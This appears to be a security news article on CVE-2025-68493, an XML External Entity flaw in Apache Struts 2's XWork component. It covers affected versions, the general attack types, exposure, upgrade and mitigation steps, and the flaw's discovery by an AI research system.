Apache Struts XXE Flaw Exposes Enterprise Apps to Data Theft

Apache has patched a critical XML External Entity (XXE) vulnerability in Struts 2, the widely-deployed Java web application framework. CVE-2025-68493 affects the XWork component and could allow attackers to steal sensitive files, perform server-side request forgery, or trigger denial-of-service conditions.

The flaw carries a CVSS score of 9.8 and was identified by Zast AI, an autonomous AI security research system—marking one of the first critical enterprise vulnerabilities discovered primarily through automated AI analysis.

What's Vulnerable

The vulnerability exists in XWork, the command framework that underpins Struts. XWork fails to properly validate XML configuration data, allowing attackers to inject external entity references that the parser will resolve.

Affected versions span nearly the entire Struts 2 lineage:

Version Range	Status
2.0.0 - 2.2.1 (opensymphony:xwork)	End of life
2.2.1 - 6.1.0 (xwork-core)	Patch available
2.0.0 - 2.3.37	End of life
2.5.0 - 2.5.33	End of life

Two of the affected ranges are end-of-life, meaning organizations running those versions face a difficult choice: upgrade to a supported release or accept permanent exposure.

Attack Scenarios

XXE vulnerabilities enable several attack patterns:

1. File Disclosure: Attackers craft XML payloads that reference local files like /etc/passwd or application configuration files. The parser fetches and includes the content, which then gets returned in error messages or responses.

2. Server-Side Request Forgery: External entity references can point to internal network resources, allowing attackers to probe internal services, access cloud metadata endpoints, or interact with databases.

3. Denial of Service: Recursive entity definitions create exponential memory consumption (the "billion laughs" attack), crashing target applications or entire servers.

Download Activity Shows Widespread Exposure

According to Sonatype, the affected component versions were downloaded over 380,000 times in the past week alone. This download volume indicates significant ongoing exposure across enterprise Java deployments.

Struts powers countless internal applications, customer portals, and back-office systems. Organizations often don't inventory their Struts usage until a vulnerability like Log4Shell forces emergency audits. Many may not realize CVE-2025-68493 affects them until exploitation attempts appear in logs.

Immediate Actions

1. Upgrade to Struts 6.1.1 which contains the fix for S2-069
2. Inventory Struts deployments across development, staging, and production environments
3. Review web application firewalls for XXE blocking rules and ensure they're active
4. Disable external entity processing in XML parsers where possible as defense-in-depth
5. Monitor for exploitation by searching logs for unusual XML parsing errors or file access patterns

Organizations running end-of-life Struts versions face a harder path. The framework doesn't backport security fixes to unsupported releases, so upgrading to the current supported branch is the only complete mitigation.

The AI Discovery Angle

CVE-2025-68493 stands out as one of the first critical vulnerabilities in major enterprise software discovered by an AI system. Zast AI, credited in Apache's advisory, represents an emerging class of autonomous security research tools that can analyze codebases at scale.

For defenders, this signals a coming wave of AI-discovered vulnerabilities in legacy codebases that human researchers may have overlooked. Security teams should expect patch volumes to increase as these tools mature and attackers deploy similar capabilities offensively.

The discovery also demonstrates that even thoroughly audited frameworks like Struts can harbor critical flaws for years. The XWork component has been part of Struts since 2007—meaning this XXE weakness existed undetected for nearly two decades.